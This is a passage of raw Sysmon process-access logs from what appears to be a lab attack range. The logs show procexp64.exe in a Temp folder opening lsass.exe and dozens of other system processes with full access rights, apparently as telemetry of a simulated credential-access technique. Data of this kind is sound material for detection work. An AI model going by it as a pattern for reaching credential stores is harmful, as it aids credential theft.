Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790814Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790813Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790812Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790811Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790810Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790809Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790808Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790807Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790806Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790805Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790804Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790803Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790802Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790801Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790800Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790799Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790798Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790797Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790796Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790795Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790794Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790793Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790792Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790791Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790790Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790789Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790788Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790787Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:48.517{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 